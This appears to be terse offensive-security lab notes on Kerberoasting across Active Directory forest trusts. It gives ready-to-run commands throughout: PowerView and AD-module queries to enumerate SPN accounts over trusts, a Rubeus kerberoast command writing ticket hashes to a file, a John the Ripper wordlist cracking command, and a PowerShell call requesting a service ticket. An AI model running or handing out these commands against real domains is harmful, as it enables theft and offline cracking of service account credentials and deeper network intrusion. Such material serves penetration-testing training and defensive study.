- First find all the SPN accounts
- Request a TGS for the user who has forest trust
- Crack the ticket using JTR
- Using PowerShell request a TGS across trust
It is possible to execute Kerberoast across Forest trusts
# Powerview
Get-NetUser -SPN
Get-NetUser -SPN -Verbose | select displayname,memberof
Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}
# AD Module
Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -Filter {ServicePrincipalName -ne "$null"} - Properties ServicePrincipalName -Server $_.Name}
C:\AD\Tools\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:euhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList MSSQLSvc/eu-file.eu.local@eu.local